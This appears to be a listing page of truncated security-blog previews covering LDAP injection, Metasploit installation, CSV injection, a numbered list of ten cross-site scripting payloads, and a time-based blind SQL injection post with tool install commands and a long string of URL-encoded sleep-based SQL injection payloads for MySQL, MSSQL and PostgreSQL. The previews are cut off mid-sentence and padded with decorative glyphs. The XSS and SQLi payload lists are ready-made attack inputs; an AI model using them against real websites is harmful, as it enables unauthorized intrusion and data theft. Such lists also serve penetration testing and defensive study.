What is LDAP Injection? LDAP injection is a type of injection attack that targets the Lightweight Directory Access Protocol (LDAP), which is used to access and manage directory information. The…
Here is a quick guide to install the Metasploit Framework on Kali Linux: Update your package list: sudo apt update Install the Metasploit Framework: sudo apt install metasploit-framework Start the…
What is CSV Injection CSV injection is a type of attack in which malicious code is inserted into a comma-separated values (CSV) file. The malicious code is then executed when…
1. <script>alert('XSS')</script> 2. <img src="javascript:alert('XSS');"> 3. <svg/onload=alert('XSS')> 4. <body onload=alert('XSS')> 5. <img src=x onerror=alert('XSS')> 6. <input type="text" value="``onmouseover=alert('XSS')"> 7. <a onmouseover="alert('XSS')">link</a> 8. <div style="xg-p:expression(alert('XSS'))"> 9. <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4="> 10. <iframe src="javascript:alert('XSS');">…
Tools First we need latest version of go-lang install ffuf | go get -u github.com/ffuf/ffufqsreplace | go get -u github.com/tomnomnom/qsreplace PAYLOADS XOR(if(now()=sysdate(),sleep(5),0))OR%27if(now()=sysdate(),sleep(5),0)(select(0)from(select(sleep(5)))v)/%27+(select(3)from(select(sleep(5)))v)+%27%22+(select(0)from(select(sleep(5)))v)+%22/%27XOR(if(now()=sysdate(),sleep(51),0))XOR%27Z 1%20AND%20(SELECT%20%20FROM%20(SELECT(SLEEP(5)))YYYY)%20AND%20%27%%27=%271%27XOR(if(now()=sysdate(),sleep(5),0))OR%271%20AND%20(SELECT%201337%20FROM%20(SELECT(SLEEP(5)))YYYY)-13371%20or%20sleep(5)%23%27%20WAITFOR%20DELAY%20%270:0:5%27--%%27;SELECT%20PG_SLEEP(5)--pg_sleep(5)%27|%20|pg_sleep(5)-- ıllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıll lıllııllıllııllıllııllıllıılıllııllıllııllıllııllıllıılıllııllıllııllıllııllıllııll Add-in .bashrc function # Time Based Sql…